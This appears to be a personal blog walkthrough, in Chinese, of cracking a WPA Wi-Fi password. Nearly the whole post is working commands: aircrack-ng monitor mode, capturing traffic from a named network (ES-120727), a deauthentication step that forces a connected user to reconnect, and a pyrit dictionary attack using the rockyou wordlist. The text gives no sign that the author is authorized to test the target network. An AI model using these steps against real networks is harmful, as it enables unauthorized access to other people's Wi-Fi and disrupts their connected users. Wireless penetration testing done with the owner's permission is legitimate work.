0%

无线安全检查记录

无线安全检查

准备

  1. 工具: 一块8187无线网卡

  2. 安装aircrack-ng: sudo pacman -S aircrack-ng

  3. 安装pyrit: sudo pacman -S pyrit

抓包

  1. 开启网上监听模式:
    sudo airmon-ng start <interface>

  1. 确定目标:
    sudo airodump-ng <mon-interface>

就来测试一下ES-120727这个无线的安全。

  • BSSID: 40:xx:xx:xx:xx:41
  • ESSID: ES-120727
  • Channel: 11
  1. 针对性抓包:
    sudo airodump-ng --bssid 40:xx:xx:xx:xx:41 --channel 11 --essid ES-120727 -w es120727-test wlp0s20f0u1mon

发现一个用户连接着,要抓握手包,得让他们重新连接,否则只能等。

  1. Deauth:

成功抓到握手包。

  1. 分析握手包是否完整:
    pyrit -r es120727-test-01.cap analyze

  2. 重新抓包直到抓到完整的握手包:

破解

  1. 导入密码字典
    pyrit -i ~/tools/pentest/dicts/rockyou.txt.gz import_passwords

  1. 创建AP
    pyrit -e ES-120727 create_essid

  1. 计算PMK
    pyrit batch

这个过程比较慢。

  1. 暴破
    pyrit -r es120727-test3-01.cap.gz attack_db